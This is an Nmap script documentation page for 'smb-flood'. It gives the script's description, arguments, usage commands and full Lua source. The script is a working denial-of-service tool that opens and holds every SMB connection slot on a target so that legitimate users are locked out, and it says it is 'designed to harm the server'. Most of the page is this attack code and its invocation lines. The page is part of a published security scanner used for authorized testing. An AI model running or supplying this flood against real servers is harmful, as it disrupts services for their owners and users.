<html><head><style>body {font-family: verdana;font-size: 0.7em;} tr {font-family: verdana;font-size: 0.7em;}</style></head><body>
<h3>File smb-flood</h3>
<b>Script types:</b> hostrule<br/>
<b>Categories:</b> auth,auth<br/>
<b>Author:</b> Ron Bowes<br/>
<b>License:</b> <a href="https://nmap.org/book/man-legal.html" target=_blank>https://nmap.org/book/man-legal.html</a><br/>
<b>Download:</b> <a href="https://svn.nmap.org/nmap/scripts/smb-flood.nse">https://svn.nmap.org/nmap/scripts/smb-flood.nse</a><br/>
<h3>Summary</h3>
<p>Exhausts a remote SMB server's connection limit by by opening as many connections as we can. Most implementations of SMB have a hard global limit of 11 connections for user accounts and 10 connections for anonymous. Once that limit is reached, further connections are denied. This script exploits that limit by taking up all the connections and holding them.</p>
<p>This works better with a valid user account, because Windows reserves one slot for valid users. So, no matter how many anonymous connections are taking up spaces, a single valid user can still log in.</p>
<p>This is *not* recommended as a general purpose script, because a) it is designed to harm the server and has no useful output, and b) it never ends (until timeout).</p>
<h3>Arguments</h3>
<table>
<tr><td>smbdomain:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.html">smbauth</a> library.</td></tr>
<tr><td>smbhash:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.html">smbauth</a> library.</td></tr>
<tr><td>smbnoguest:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.html">smbauth</a> library.</td></tr>
<tr><td>smbpassword:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.html">smbauth</a> library.</td></tr>
<tr><td>smbtype:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.html">smbauth</a> library.</td></tr>
<tr><td>smbusername:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.html">smbauth</a> library.</td></tr>
<tr><td>randomseed:</td><td>See the documentation for the <a href="nmap/libraries/smb.html">smb</a> library.</td></tr>
<tr><td>smbbasic:</td><td>See the documentation for the <a href="nmap/libraries/smb.html">smb</a> library.</td></tr>
<tr><td>smbport:</td><td>See the documentation for the <a href="nmap/libraries/smb.html">smb</a> library.</td></tr>
<tr><td>smbsign:</td><td>See the documentation for the <a href="nmap/libraries/smb.html">smb</a> library.</td></tr>
</table>
<h3>Usage</h3>
<pre>nmap --script smb-flood.nse -p445 &lt;host&gt;
nmap -sU -sS --script smb-flood.nse -p U:137,T:139 &lt;host&gt;</pre>
<h3>Output</h3>
<pre>n/a</pre>
<h3>Requirements</h3>
<ul>
<li><a href="nmap/libraries/smb.htm">smb</a></li>
<li><a href="nmap/libraries/stdnse.htm">stdnse</a></li>
<li><a href="nmap/libraries/table.htm">table</a></li>
</ul>
<h3>Code</h3>
<pre>local smb = require &quot;smb&quot;
local stdnse = require &quot;stdnse&quot;
local table = require &quot;table&quot;

description = [[
Exhausts a remote SMB server&#39;s connection limit by by opening as many
connections as we can.  Most implementations of SMB have a hard global
limit of 11 connections for user accounts and 10 connections for
anonymous. Once that limit is reached, further connections are
denied. This script exploits that limit by taking up all the
connections and holding them.

This works better with a valid user account, because Windows reserves
one slot for valid users. So, no matter how many anonymous connections
are taking up spaces, a single valid user can still log in.

This is *not* recommended as a general purpose script, because a) it
is designed to harm the server and has no useful output, and b) it
never ends (until timeout).
]]

---
-- @usage
-- nmap --script smb-flood.nse -p445 &lt;host&gt;
-- sudo nmap -sU -sS --script smb-flood.nse -p U:137,T:139 &lt;host&gt;
--
-- @output
-- n/a
-----------------------------------------------------------------------



author = &quot;Ron Bowes&quot;
copyright = &quot;Ron Bowes&quot;
license = &quot;Same as Nmap--See https://nmap.org/book/man-legal.html&quot;
categories = {&quot;intrusive&quot;,&quot;dos&quot;}
dependencies = {&quot;smb-brute&quot;}


hostrule = function(host)
  return smb.get_port(host) ~= nil
end

action = function(host)
  local states = {}
  repeat
    local status, result = smb.start_ex(host, true, true)
    if(status) then
      table.insert(states, result) -- Keep the result so it doesn&#39;t get garbage cleaned
      stdnse.debug1(&quot;Connection successfully opened&quot;)
      stdnse.sleep(.1)
    else
      stdnse.debug1(&quot;Connection failed: %s&quot;, result)
      stdnse.sleep(1)
    end
  until false
end
</pre>
